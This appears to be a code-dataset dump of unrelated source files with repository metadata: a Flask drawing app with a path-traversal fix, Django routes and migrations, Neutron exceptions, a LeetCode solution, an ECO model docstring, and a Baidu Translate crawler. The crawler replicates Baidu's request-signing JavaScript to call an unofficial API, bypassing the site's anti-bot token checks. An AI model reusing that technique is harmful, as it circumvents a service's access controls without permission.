    EditQueue().push(title=working_title, text=gen_rev,
                     bot=1, minor=1, task='rcarl')
# Manual debug entry: print the rewritten page text without editing the wiki.
if __name__ == '__main__':
    site = botsite.Site()
    print(gen_rev(site.get_text_by_title(working_title))['text'])
| [
"daizl@pku.edu.cn"
] | daizl@pku.edu.cn |
423dc96768d50d0ce647be99f48163b749c1a1e8 | 6c33e95a0f9e666a52f328b1926a3dd1d4e5ceca | /products/urls.py | 74920e4951f4e9b7ae73c06ddcf8a0c4db408f68 | [] | no_license | arpit-saxena/DevRecruitBackend | 69a0a7e694c6401df3bc87165d86353da3003410 | e49b4a6bda6a65522f2af88bc11559fda0a514f8 | refs/heads/master | 2020-04-26T03:50:36.741741 | 2019-03-15T11:15:40 | 2019-03-15T11:15:40 | 173,281,082 | 0 | 0 | null | 2019-03-13T11:22:15 | 2019-03-01T10:15:24 | Python | UTF-8 | Python | false | false | 292 | py | from django.urls import path
from . import views
urlpatterns = [
path('add', views.addProduct, name='add_product'),
path('<my_hash>/<slug:slug>/', views.viewProduct,
name='view_product'),
path('<my_hash>/<slug:slug>/modify', views.modifyProduct,
name='modify_product'),
] | [
"arpit.saxena2000@yahoo.in"
] | arpit.saxena2000@yahoo.in |
a2e4eb891f334cfc563bab64d820784eea697502 | 2405037bcbc40bb3125128a7bc265d65a1887988 | /malprogramm/views.py | 67a8a5f93d5a30350c145d88ce77e49e2074d84f | [] | no_license | FriedrichGraefe/malprogramm | 81a9d02046536fc355e20bdf0b31e7a28fa6ba9b | 9cf4ba2d6052033db9a77c3a33ec9d684dcd16aa | refs/heads/master | 2023-02-20T05:02:27.285769 | 2021-01-21T18:01:28 | 2021-01-21T18:01:28 | 325,240,437 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,545 | py | from flask import render_template, request, redirect, send_from_directory
from flask_security import login_required
from malprogramm import app, db
import base64
from malprogramm.models import Image
@app.route('/')
def startseite():
    """Render the landing page."""
    return render_template('startseite.html')
@app.route('/malen', methods=['POST', 'GET'])
@login_required
def malen():
    """Drawing page: GET renders the canvas, POST saves a submitted image.

    The POST body is JSON: {'cdata': canvas data-URL (PNG),
    'userid': owning user id, 'imgname': user-chosen image name}.
    """
    if request.method == 'POST':
        data = request.get_json()
        canvasdata = data.get('cdata')
        userid = data.get('userid')
        imagename = data.get('imgname')
        # The canvas data URL looks like "data:image/png;base64,<payload>";
        # keep only the base64 payload after the first comma.
        canvasdata = canvasdata.split(",", 1)[1]
        # Security fix: 'imgname' is untrusted input used to build a filesystem
        # path -- strip any directory components to prevent path traversal
        # (e.g. imgname = "../../evil"). The sanitized name is also stored in
        # the DB so gallery/download stay consistent with the file on disk.
        import os.path
        imagename = os.path.basename(imagename)
        saveimage = './malprogramm/images/' + imagename + '.png'
        # Record the image in the database (Image table).
        image = Image(filename=imagename, user_id=userid)
        db.session.add(image)
        db.session.commit()
        # Persist the decoded PNG bytes to the images directory.
        picture_data = base64.b64decode(canvasdata)
        with open(saveimage, 'wb') as f:
            f.write(picture_data)
        return redirect('/', code=303)
    else:
        return render_template('malen.html')
@app.route('/gallery')
def gallery():
    """Show every stored image record in the gallery template."""
    all_images = Image.query.all()
    return render_template('gallery.html', images=all_images)
@app.route('/download/<filename>')
def download(filename):
    """Serve a previously saved image file from the images directory."""
    return send_from_directory('images', filename)
| [
"friedrich.graefe@hs-augsburg.de"
] | friedrich.graefe@hs-augsburg.de |
6a620bfe1483232806e3b0ebf8b8c27b4cc96c13 | cbb25468ae43ef8521c4837497630f7a3685b8f0 | /airSolution/management/migrations/0005_auto_20200313_1253.py | 28acce09a86f1ff7e77d6bc6b42f1506c3405577 | [] | no_license | Claudio-Padilha/airSolution | f283001abc501035153dd27977d4d91a0c0482d0 | c71f3bef6e74b5021288ef779fae61ecaa69dbb5 | refs/heads/master | 2021-02-07T01:52:24.403345 | 2020-03-14T02:19:39 | 2020-03-14T02:19:39 | 243,969,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | # Generated by Django 3.0.3 on 2020-03-13 16:53
import builtins
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Adds Maquina.install_date and re-points the VisitaVenda.seller FK."""
    dependencies = [
        ('management', '0004_auto_20200304_1845'),
    ]
    operations = [
        migrations.AddField(
            model_name='maquina',
            name='install_date',
            # NOTE(review): default=builtins.dir sets a builtin *function* as
            # the one-off default -- almost certainly a placeholder typed at
            # the makemigrations prompt; verify existing rows got sane values.
            field=models.DateTimeField(default=builtins.dir),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='visitavenda',
            name='seller',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='management.Vendedor'),
        ),
    ]
| [
"padilha86@gmail.com"
] | padilha86@gmail.com |
61d7436c0fabed05f221dbd89c4fba3bccea59c9 | 0b344fa1202824ac1b312115c9d85467dd0b2b50 | /neutron/plugins/embrane/common/exceptions.py | 763dabdad242fb42be3b94bd0e040b4739bbe93b | [
"Apache-2.0"
] | permissive | netscaler/neutron | 78f075633462eb6135032a82caf831a7e10b27da | 1a17ee8b19c5440e1300426b5190de10750398e9 | refs/heads/master | 2020-06-04T01:26:12.859765 | 2013-10-17T06:58:30 | 2013-10-17T06:58:30 | 13,155,825 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,202 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Embrane, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Ivar Lazzaro, Embrane, Inc.
from neutron.common import exceptions as neutron_exec
class EmbranePluginException(neutron_exec.NeutronException):
    """Base exception for unexpected Embrane plugin errors."""
    message = _("An unexpected error occurred:%(err_msg)s")
# Not permitted operation
class NonPermitted(neutron_exec.BadRequest):
    """Marker for operations rejected as bad requests (not permitted)."""
    pass
class StateConstraintException(NonPermitted):
    """Raised when a DVA's current state forbids the requested operation."""
    message = _("Operation not permitted due to state constraint violation:"
                "%(operation)s not allowed for DVA %(dva_id)s in state "
                " %(state)s")
| [
"ivar@embrane.com"
] | ivar@embrane.com |
e3e9f33d0c4837ed75d9d742e6ebc224174b49bf | b65932753a73cc17da5ac3bae8aa161b0ce60469 | /pytorch-pretrained-BERT/scripts/crawler.py | d8fe68f943801b7da99347d343675aeee0dead0b | [
"Apache-2.0"
] | permissive | Albert-Ma/bert-fine-tuned-gain | 24199334b8299a4ef5ca3a637d0074a7e4ea7def | f752c1182f1c800f5f56998e13fd6115929df655 | refs/heads/master | 2022-12-24T05:55:38.541991 | 2019-07-24T13:41:35 | 2019-07-24T13:41:35 | 183,029,262 | 2 | 1 | Apache-2.0 | 2022-12-10T11:01:43 | 2019-04-23T14:11:04 | Python | UTF-8 | Python | false | false | 15,779 | py | import nltk
import time
import random
import argparse
from tqdm import tqdm
from bs4 import BeautifulSoup
from selenium import webdriver
from bs4 import NavigableString
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import Select, WebDriverWait
BASE_URL = 'https://fanyi.baidu.com/?aldtype=16047#en/zh/'
# def load_html(url=None):
# """Open web from browser."""
# try:
# browser = webdriver.Chrome()
# browser.get(url)
# except:
# return None
# return browser
#
#
# def parse_html(brownser, word, flag=True):
# """Parse web and invoked once for synonyms.
# :return [{original word: sentence_list},{synonyms word: sentence_list}]"""
# origin = {}
# result = []
# synonyms_click = 'side-nav'
# nav = brownser.find_element_by_class_name(synonyms_click)
# a = nav.find_element_by_class_name('nav-item')
# WebDriverWait(brownser, 10).until(
# EC.element_to_be_clickable((By.CLASS_NAME, synonyms_click))).click()
# exit(0)
# # origin[word] = crawler(brownser, biligual_examples_xpath)
# # print(origin)
# # if this word does not have biliguai examples,
# if origin[word] is None:
# brownser.quit()
# return {}
# # or this word does not have a verbed sentence
# origin = check_word_pos(origin)
# if len(origin[word]) == 0:
# brownser.quit()
# return {}
# if flag:
# result.append(origin)
# synonyms_xpath = '//*[@id="synonyms"]/ul'
# try: # check if this word has `synonyms`
# brownser.find_element_by_xpath(synonyms_click)
# WebDriverWait(brownser, 10).until(
# EC.element_to_be_clickable((By.XPATH, synonyms_click))).click()
# synonyms = brownser.find_element_by_xpath(synonyms_xpath)
# except:
# print("word ({}) has no synonyms".format(word))
# brownser.quit()
# return result
# word_group = synonyms.find_elements_by_class_name('search-js')
# # '#synonyms > ul > p:nth-child(2) > span:nth-child(1) > a'
# for w in word_group:
# try: # if there is something wrong here, we skip it.
# driver = load_html(w.get_attribute('href'))
# if driver is None:
# driver.quit()
# time.sleep(60)
# continue
# # We just consider one single word.
# if len(w.text.strip().split()) > 1:
# driver.quit()
# continue
# sysn = parse_html(driver, w.text, False)
# print("word ({})'s sysn ({})".format(word, sysn))
# if len(sysn) == 0 or len(sysn[w.text]) == 0:
# driver.quit()
# else:
# result.append(sysn)
# driver.quit()
# except:
# continue
# brownser.quit()
# return result
# else:
# # if this is the last web to crawl, we return dict{word: sentences}
# brownser.quit()
# return origin
#
#
# def crawler(brownser, xpath):
# """Crawl data from web.
# :return sentence_list"""
# original = []
# try:
# brownser.find_element_by_xpath(xpath)
# except:
# return None
# soup = BeautifulSoup(brownser.page_source, "html.parser")
# res = soup.select('#bilingual > ul')
# for sents in res: # ul
# for s in sents: # <li>
# sents = []
# for i, p in enumerate(s):
# if isinstance(p, str):
# continue
# else:
# if i == 1:
# if len(p) != 0:
# for sp in p:
# if isinstance(sp, NavigableString):
# continue
# sents.append(sp.text.strip())
# if len(sents) == 0:
# continue
# original.append(" ".join(sents))
# return original
#
#
# def build_pairwise(result):
# """Build pairwise data."""
# # word1 \t word2 \t sentence1 \t sentence2
# assert len(result) > 1
# lines = []
# for i, item in enumerate(result):
# word = list(item)[0]
# sentence_list = list(item.values())[0]
# if len(sentence_list) == 0:
# print("original word:{} does not have a 'verbed' sentence"
# .format(word))
# return lines
# # print(word, sentence_list)
# if i == 0:
# origin_word = word
# origin_sentences = sentence_list
# else:
# for sentence in sentence_list:
# lines.append("{}\t{}\t{}\t{}".
# format(origin_word, word,
# random.sample(origin_sentences, 1)[0],
# sentence))
# return lines
#
#
# def check_word_pos(word_sentence_dict):
# """Check if this word is a VB, delete those which it's not a VB sentence.
# :return {word: sentence_list}"""
# word = list(word_sentence_dict)[0]
# sentences = list(word_sentence_dict.values())[0]
#
# result_sentences = []
# pos_tags = []
# for sentence in sentences:
# # TODO: cause we only use one single word, so we do a word_tokenize and do one word match
# pos_tags.append(nltk.pos_tag(nltk.word_tokenize(sentence)))
# for i, pos_tag_sentence in enumerate(pos_tags):
# # sentence
# flag = False
# for pos_tag_word in pos_tag_sentence:
# if pos_tag_word[0] == word:
# if str(pos_tag_word[1]).startswith('VB'):
# print("word:({}), in this sentence:({}) is a verb."
# .format(word, sentences[i]))
# flag = True
# break
# if flag:
# result_sentences.append(sentences[i])
# return {word: result_sentences}
#
#
# def main():
# words = []
# with open(args.vocab_file, 'r') as f:
# lines = f.readlines()
# for i, word in enumerate(lines):
# if i <= 647:
# continue
# if i > 2000:
# break
# words.append(word.split('\t')[0])
#
# words = ['make']
# c = 0
# with open(args.output_file, 'a+') as writer:
# for i, word in enumerate(tqdm(words)):
# # if c > 647:
# # print("lines:{} break.".format(i))
# # break
# driver = load_html(BASE_URL+word)
# result = parse_html(driver, word)
# # if this word does not have syns
# if len(result) <= 1:
# continue
# lines = build_pairwise(result)
# print("word:{}, result:{}".format(word, lines))
# print("*"*20)
# for line in lines:
# if len(line.strip()) == 0:
# continue
# writer.write(line + '\n')
# c += 1
# # writer.close()
# # exit(0)
# driver.quit()
# # time.sleep(5)
#
#
# if __name__ == '__main__':
# parser = argparse.ArgumentParser()
# parser.add_argument("--vocab_file", type=str, required=True)
# parser.add_argument("--output_file", default='result.txt', type=str, required=True)
#
# args = parser.parse_args()
#
# main()
import execjs
import requests
import re
import json
JS_CODE = """
function a(r, o) {
for (var t = 0; t < o.length - 2; t += 3) {
var a = o.charAt(t + 2);
a = a >= "a" ? a.charCodeAt(0) - 87 : Number(a),
a = "+" === o.charAt(t + 1) ? r >>> a: r << a,
r = "+" === o.charAt(t) ? r + a & 4294967295 : r ^ a
}
return r
}
var C = null;
var token = function(r, _gtk) {
var o = r.length;
o > 30 && (r = "" + r.substr(0, 10) + r.substr(Math.floor(o / 2) - 5, 10) + r.substring(r.length, r.length - 10));
var t = void 0,
t = null !== C ? C: (C = _gtk || "") || "";
for (var e = t.split("."), h = Number(e[0]) || 0, i = Number(e[1]) || 0, d = [], f = 0, g = 0; g < r.length; g++) {
var m = r.charCodeAt(g);
128 > m ? d[f++] = m: (2048 > m ? d[f++] = m >> 6 | 192 : (55296 === (64512 & m) && g + 1 < r.length && 56320 === (64512 & r.charCodeAt(g + 1)) ? (m = 65536 + ((1023 & m) << 10) + (1023 & r.charCodeAt(++g)), d[f++] = m >> 18 | 240, d[f++] = m >> 12 & 63 | 128) : d[f++] = m >> 12 | 224, d[f++] = m >> 6 & 63 | 128), d[f++] = 63 & m | 128)
}
for (var S = h,
u = "+-a^+6",
l = "+-3^+b+-f",
s = 0; s < d.length; s++) S += d[s],
S = a(S, u);
return S = a(S, l),
S ^= i,
0 > S && (S = (2147483647 & S) + 2147483648),
S %= 1e6,
S.toString() + "." + (S ^ h)
}
"""
class Dict:
    def __init__(self):
        """Create an HTTP session and scrape the translation token/gtk."""
        self.sess = requests.Session()
        self.headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'
        }
        self.token = None
        self.gtk = None
        # Fetch token and gtk from the main page.
        # The page must be loaded twice so the token is fresh; otherwise the
        # API responds with error 998.
        self.loadMainPage()
        self.loadMainPage()
    def loadMainPage(self):
        """
        Load the main page (https://fanyi.baidu.com/) and scrape the
        anti-bot `token` and `gtk` values out of its inline JavaScript.
        """
        url = 'https://fanyi.baidu.com'
        try:
            r = self.sess.get(url, headers=self.headers)
            self.token = re.findall(r"token: '(.*?)',", r.text)[0]
            self.gtk = re.findall(r"window.gtk = '(.*?)';", r.text)[0]
        except Exception as e:
            raise e
            # print(e)
def langdetect(self, query):
"""
post query to https://fanyi.baidu.com/langdetect
return json
{"error":0,"msg":"success","lan":"en"}
"""
url = 'https://fanyi.baidu.com/langdetect'
data = {'query': query}
try:
r = self.sess.post(url=url, data=data)
except Exception as e:
raise e
# print(e)
json = r.json()
if 'msg' in json and json['msg'] == 'success':
return json['lan']
return None
def dictionary(self, query):
"""
max query count = 2
get translate result from https://fanyi.baidu.com/v2transapi
"""
url = 'https://fanyi.baidu.com/v2transapi'
sign = execjs.compile(JS_CODE).call('token', query, self.gtk)
lang = self.langdetect(query)
data = {
'from': 'en' if lang == 'en' else 'zh',
'to': 'zh' if lang == 'en' else 'en',
'query': query,
'simple_means_flag': 3,
'sign': sign,
'token': self.token,
}
try:
r = self.sess.post(url=url, data=data)
except Exception as e:
raise e
if r.status_code == 200:
json = r.json()
if 'error' in json:
raise Exception('baidu sdk error: {}'.format(json['error']))
# 998错误则意味需要重新加载主页获取新的token
return json
return None
def dictionary_by_lang(self, query, fromlang, tolang):
"""
max query count = 2
get translate result from https://fanyi.baidu.com/v2transapi
"""
url = 'https://fanyi.baidu.com/v2transapi'
sign = execjs.compile(JS_CODE).call('token', query, self.gtk)
lang = self.langdetect(query)
data = {
'from': fromlang,
'to': tolang,
'query': query,
'simple_means_flag': 3,
'sign': sign,
'token': self.token,
}
try:
r = self.sess.post(url=url, data=data)
except Exception as e:
raise e
if r.status_code == 200:
json = r.json()
if 'error' in json:
raise Exception('baidu sdk error: {}'.format(json['error']))
# 998错误则意味需要重新加载主页获取新的token
# print(json)
return self.parse_data(json)
return None
def trans_baidu_en1(self, text):
the_ret = self.dictionary_by_lang(text, "zh", "en")
ret1 = self.dictionary_by_lang(the_ret, "en", "zh")
return ret1
def parse_data(self, json):
synonym_data = json["dict_result"]
# check if this word have synonyms
if 'synonym' in synonym_data:
synonym_data = synonym_data["synonym"]
else:
return None
pairwise_result = []
for item in synonym_data:
# 'words' are not always correct
# words = item['words']
# TODO: a (an)
synonyms = item['synonyms']
synonyms_list = []
words = []
for item in synonyms:
if 'ex' in item and len(item['ex']) != 0:
synonyms_list.append(item['ex'])
words.append(item['syn']['word'])
elif 'be' in item: # 'after'
tmp = []
for i, sub_item in enumerate(item['be']['item']):
tmp.append(sub_item['ex'])
# print(tmp)
synonyms_list.append(tmp[0])
words.append(item['syn']['word'])
else:
raise ValueError("word do not have 'ex'")
# print(synonyms_list)
for i in range(len(words)-1):
for j in range(i+1, len(words)):
line = "{}\t{}\t{}\t{}"\
.format(words[i], words[j],
random.sample(synonyms_list[i], 1)[0]['enText'],
random.sample(synonyms_list[j], 1)[0]['enText'])
pairwise_result.append(line)
return pairwise_result
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("--vocab_file", type=str, required=True)
    parser.add_argument("--output_file", default='result.txt', type=str, required=True)
    parser.add_argument("--min_count", default=100, type=int)
    parser.add_argument("--debug", action='store_true')
    args = parser.parse_args()
    baidu_dict = Dict()
    words = []
    # vocab_file format: one "word<TAB>count" entry per line.
    with open(args.vocab_file, 'r') as f:
        lines = f.readlines()
        for i, line in enumerate(lines):
            if i < 788:
                # Skip the first 788 entries — presumably resuming an
                # interrupted run; TODO confirm this magic offset.
                continue
            word, count = line.split('\t')
            if int(count) > args.min_count:
                words.append(word)
    if args.debug:
        words = ['after', 'too', 'speed']
    synonyms_vocab = set()
    # Append mode so repeated runs extend the same result file.
    with open(args.output_file, 'a+') as writer:
        for i, word in enumerate(tqdm(words)):
            res = baidu_dict.dictionary_by_lang(word, "en", "zh")
            print("="*20)
            print("word:{}, result:{}".format(word, res))
            # word do not have synonyms
            if res is None:
                continue
            for line in res:
                if len(line.strip()) == 0:
                    continue
                word_a, word_b, _, _ = line.split('\t')
                # Deduplicate on the (word_a, word_b) pair only.
                if '\t'.join([word_a, word_b]) not in synonyms_vocab:
                    synonyms_vocab.add('\t'.join([word_a, word_b]))
                    writer.write(line + '\n')
            # Throttle requests to avoid being rate-limited by the site.
            time.sleep(1)
| [
"xymasdu@163.com"
] | xymasdu@163.com |
a389369331938ca08113608bad0aab9013523972 | a9e1e853717e8cb89f02c035915dd02eca800b44 | /logic/logic_adapter.py | 429a81c2f5904b259af28682a0a2056cc358b57e | [] | no_license | sobhanlenka/mitoo | b314774603803609333fa530cf135ec6b65b050a | 9c30eb186d8f9e61cd5db6e98929d25814def758 | refs/heads/master | 2022-11-14T12:13:22.786968 | 2018-07-05T06:32:25 | 2018-07-05T06:32:25 | 138,338,235 | 0 | 1 | null | 2022-10-18T13:08:04 | 2018-06-22T18:56:23 | Python | UTF-8 | Python | false | false | 3,685 | py | from __future__ import unicode_literals
from mitoo.adapters import Adapter
from mitoo.utils import import_module
class LogicAdapter(Adapter):
    """
    Abstract interface for logic adapters.

    Concrete logic adapters subclass this and override :meth:`process`.

    :param statement_comparison_function: Dot-notated import path of (or a
        direct reference to) the function used to compare two statements.
        Defaults to ``levenshtein_distance``.
    :param response_selection_method: Dot-notated import path of (or a
        direct reference to) the strategy used to pick one response from
        several candidates. Defaults to ``get_first_response``.
    """

    def __init__(self, **kwargs):
        super(LogicAdapter, self).__init__(**kwargs)
        from mitoo.comparisons import levenshtein_distance
        from mitoo.response_selection import get_first_response

        # Parameters supplied as dot-notated strings are resolved into the
        # callables they point at before being used.
        for parameter in ('statement_comparison_function', 'response_selection_method'):
            if parameter in kwargs and isinstance(kwargs[parameter], str):
                kwargs[parameter] = import_module(kwargs[parameter])

        # Levenshtein distance is the default way to compare statements.
        self.compare_statements = kwargs.get(
            'statement_comparison_function',
            levenshtein_distance
        )

        # Picking the first available response is the default strategy.
        self.select_response = kwargs.get(
            'response_selection_method',
            get_first_response
        )

    def get_initialization_functions(self):
        """
        Return a dictionary of functions to be run once when the chat bot
        is instantiated.
        """
        return self.compare_statements.get_initialization_functions()

    def initialize(self):
        """Execute every registered initialization function."""
        for initialization_function in self.get_initialization_functions().values():
            initialization_function()

    def can_process(self, statement):
        """
        Preliminary check that tells whether this logic adapter can handle
        the given statement. True by default; subclasses may narrow it.

        :rtype: bool
        """
        return True

    def process(self, statement):
        """
        Select a response to the input statement and return it, together
        with a confidence value rating how accurate the adapter expects
        the response to be. Confidence must lie between 0 (lowest) and 1
        (highest); it is used to pick the best response across adapters.

        :param statement: An input statement to be processed by the logic adapter.
        :type statement: Statement

        :rtype: Statement
        """
        raise self.AdapterMethodNotImplementedError()

    @property
    def class_name(self):
        """
        Name of the concrete logic adapter class, typically used for
        logging and debugging.
        """
        return str(self.__class__.__name__)
class EmptyDatasetException(Exception):
    """Raised when an empty set of statements is received although at
    least one statement was expected."""

    def __init__(self, value='An empty set was received when at least one statement was expected.'):
        # Keep the message on a public attribute for callers that inspect it.
        self.value = value

    def __str__(self):
        return repr(self.value)
| [
"sobhanlenka@gmail.com"
] | sobhanlenka@gmail.com |
3ba7d3ae1a5af39ab73f989f58e0695be999fd45 | 0d3a8de8a5e4cebe091fa1d447411e4a28087c5c | /checkout/migrations/0003_auto_20200301_2355.py | dda7b3f0fe30ad263f8fc2295968d4af9a2fd141 | [
"MIT"
] | permissive | tstauras83/Django-milestone-project-P2 | b66792cf8430263df1cefc45c6780d9880a5707c | e8b973f91e0a0386c140ecfa396f245cc4e0350f | refs/heads/main | 2023-03-13T05:05:52.210359 | 2021-02-28T20:38:56 | 2021-02-28T20:38:56 | 340,364,524 | 0 | 1 | MIT | 2021-02-28T18:15:37 | 2021-02-19T12:35:58 | HTML | UTF-8 | Python | false | false | 429 | py | # Generated by Django 3.0.1 on 2020-03-01 23:55
from django.db import migrations
import django_countries.fields
class Migration(migrations.Migration):
    """Auto-generated schema migration: restrict the ``country`` field of
    ``Order`` to django-countries' two-letter ISO country codes."""

    dependencies = [
        ('checkout', '0002_auto_20200301_0129'),
    ]

    operations = [
        migrations.AlterField(
            model_name='order',
            name='country',
            field=django_countries.fields.CountryField(max_length=2),
        ),
    ]
| [
"74678836+tstauras83@users.noreply.github.com"
] | 74678836+tstauras83@users.noreply.github.com |
36eef88f9be11b834b7c966f8e0e37c3e0e6c41b | 8388d0ed8ad412c47d47dd9da8f05e35f7e2644c | /accepted/48-rotate-image.py | 7a18dd7fa4f48ec671c91742020ac5e4795f1851 | [] | no_license | luodichen/leetcode-solution | d4cd5abbb0f5cf640035b563ed566c706d4fcbed | 74c2f9e0e60e64c84be6db9b0511db037d12b109 | refs/heads/master | 2020-05-16T16:45:42.056541 | 2015-11-16T05:41:59 | 2015-11-16T05:41:59 | 39,545,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # https://leetcode.com/problems/rotate-image/
class Solution:
    # @param {integer[][]} matrix
    # @return {void} Do not return anything, modify matrix in-place instead.
    def rotate(self, matrix):
        """Rotate the square matrix 90 degrees clockwise, in place.

        A clockwise rotation maps ``old[n-1-j][i]`` to ``new[i][j]``, which
        is exactly the transpose of the vertically flipped matrix — so
        ``zip(*matrix[::-1])`` produces the rotated rows directly.

        The empty-matrix early return of ``list()`` is kept for backward
        compatibility with the original implementation.
        """
        if not matrix:
            return list()
        # Slice-assign so the caller's list object is mutated in place.
        matrix[:] = [list(row) for row in zip(*matrix[::-1])]
| [
"me@luodichen.com"
] | me@luodichen.com |
b0b3ce9da76ade12271847e373617198e6aaedbe | d21cf21a8bd3a21bd6f9ed51f88c97caaf796ab7 | /exam3/2.py | efdbd675bd2133aa8469a6837ce76a5f3d36e308 | [] | no_license | timtim1342/HSE-Programming | 8aea880c48bc1ceba97b72cc104be204bfa9fe4d | d4bdc4a2996b3c7ddf32919ed9d5e5a9c38972aa | refs/heads/master | 2018-09-06T06:28:37.243634 | 2018-06-19T09:49:00 | 2018-06-19T09:49:00 | 105,033,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,005 | py | import os, re#не успел перевести все в один файл
# Global tally: abbreviation -> number of occurrences across all files.
abr = {}
def files_in_dir():
    """Return the names of all entries in the current working directory."""
    entries = os.listdir()
    return entries
def change_dir(dir_name):
    """Switch the process's current working directory to *dir_name*."""
    os.chdir(dir_name)
def opn(name):
    """Read the file *name* (cp1251-encoded) and return its full text."""
    with open(name, encoding='windows-1251') as source:
        contents = source.read()
    return contents
def find_abr(file_names):
    """Tally every lex="..." abbreviation found in *file_names*.

    Occurrence counts are accumulated into the module-level ``abr``
    dictionary (abbreviation -> count).
    """
    global abr
    for file_name in file_names:
        text = opn(file_name)
        for abbreviation in re.findall(r'lex=\"([А-Я]+)\"', text):
            abr[abbreviation] = abr.get(abbreviation, 0) + 1
def write_csv():
    """Dump the accumulated ``abr`` counts to ``exam2.csv`` (UTF-16, TSV)."""
    global abr
    with open('exam2.csv', 'w', encoding='utf-16') as output:
        for abbreviation in abr:
            output.write(abbreviation + '\t' + str(abr[abbreviation]))
            output.write('\n')
def main():
    # Work inside the 'news' corpus directory, tally abbreviation counts
    # across every file there, then write the summary spreadsheet.
    change_dir('news')
    find_abr(files_in_dir())
    write_csv()
# Script entry point.
if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | timtim1342.noreply@github.com |
581124b6720460f7dbcacd1229e19d30f617319e | a0a787923477b8c944b0973c932aaef379b573f5 | /model_zoo/ECOold.py | 02f817108bafce1b7037358d427dfd7142b11d21 | [] | no_license | bdus/Action-Recognition | 553e0b91ce54c0b049c826273b8c16df733075a1 | e2081963afbb89c4db12034f0168377d0369b789 | refs/heads/master | 2022-10-15T08:56:23.448630 | 2020-06-16T14:34:52 | 2020-06-16T14:34:52 | 218,713,321 | 1 | 0 | null | 2020-01-22T10:49:04 | 2019-10-31T07:57:05 | HTML | UTF-8 | Python | false | false | 15,619 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 7 17:48:26 2020
@author: bdus
eco
from mxnet import nd
from model_zoo import get_model as myget
net = myget(name='eco_resnet18_v1b_k400',nclass=101,num_segments=32,input_channel=3,batch_normal=False)
X = nd.zeros(shape=(5,32,3,224,224))
X = X.reshape((-1,) + X.shape[2:])
net(X).shape == (5,101)
reference :
https://github.com/jangho2001us/pytorch_eco/blob/master/resnet_3d.py
https://data.lip6.fr/cadene/pretrainedmodels/
https://github.com/apache/incubator-mxnet/blob/master/example/image-classification/symbols/inception-bn.py
t= nd.zeros(shape=(5,segment,3,224,224))
t = t.reshape((-1,) + t.shape[2:])
N=8时候 [512,1024]
N=16时候 shape=(512,2048)
import mxnet as mx
from model_zoo import get_model as myget
from mxnet import nd ,init
from mxnet.gluon import nn
basemodel = 'resnet18_v1b'
basemodel = 'resnet34_v1b'
basemodel = 'resnet18_v1b_ucf101'
basemodel = 'resnet34_v1b_ucf101'
basemodel = 'resnet18_v1b_k400_ucf101'
basemodel = 'resnet34_v1b_k400_ucf101'
basemodel = 'resnet50_v1b'
basemodel = 'resnet101_v1b'
basemodel = 'resnet152_v1b'
basemodel = 'resnet50_v1b_ucf101'
basemodel = 'resnet101_v1b_ucf101'
basemodel = 'resnet152_v1b_ucf101'
basemodel = 'resnet50_v1b_k400_ucf101'
basemodel = 'resnet101_v1b_k400_ucf101'
basemodel = 'resnet152_v1b_k400_ucf101'
def printmodel(basemodel,segment=4,expo=1):
t= nd.zeros(shape=(5,segment,3,224,224))
t = t.reshape((-1,) + t.shape[2:])
basenet = myget(name=basemodel,nclass=101,num_segments=1,input_channel=3,batch_normal=False)
basenet.initialize()
t = basenet.conv1(t)
print("conv1:",t.shape)
t = basenet.bn1(t)
t = basenet.relu(t)
t = basenet.maxpool(t)
print("maxpool:",t.shape)
t = basenet.layer1(t)
print("layer1:",t.shape)
t = basenet.layer2(t)
print("layer2:",t.shape)
t = t.reshape((-1,segment,128*expo,28,28))
print("reshape:",t.shape)
t = t.transpose(axes=(0,2,1,3,4))
print("transpose:",t.shape)
printmodel('resnet50_v1b_ucf101',4,4)
printmodel('resnet18_v1b_ucf101',4,1)
printmodel('resnet50_v1b_ucf101',8,4)
printmodel('resnet18_v1b_ucf101',8,1)
printmodel('resnet50_v1b_ucf101',16,4)
printmodel('resnet18_v1b_ucf101',16,1)
printmodel('resnet50_v1b_ucf101',32,4)
printmodel('resnet18_v1b_ucf101',32,1)
def getf3d(exp=1,temp=1,avgtmp=1):
f3d = nn.HybridSequential(prefix='')
# conv3_x
f3d.add(BasicBlock(in_channel=128*exp,out_channel=128,spatial_stride=1,temporal_stride=temp))
f3d.add(BasicBlock(in_channel=128,out_channel=128,spatial_stride=1,temporal_stride=1))
# conv4_x
f3d.add(BasicBlock(in_channel=128,out_channel=256,spatial_stride=2,temporal_stride=2))
f3d.add(BasicBlock(in_channel=256,out_channel=256,spatial_stride=1,temporal_stride=1))
# conv5_x
f3d.add(BasicBlock(in_channel=256,out_channel=512,spatial_stride=2,temporal_stride=2))
f3d.add(BasicBlock(in_channel=512,out_channel=512,spatial_stride=1,temporal_stride=1))
f3d.add(nn.AvgPool3D(pool_size=(avgtmp,7,7)))
f3d.initialize()
return f3d
f3d = getf3d(1,1)
f3d = getf3d(1,2)
f3d = getf3d(4,1)
f3d = getf3d(4,2)
f3d = getf3d(1,1,2)
f3d = getf3d(1,2,2)
f3d = getf3d(4,1,2)
f3d = getf3d(4,2,2)
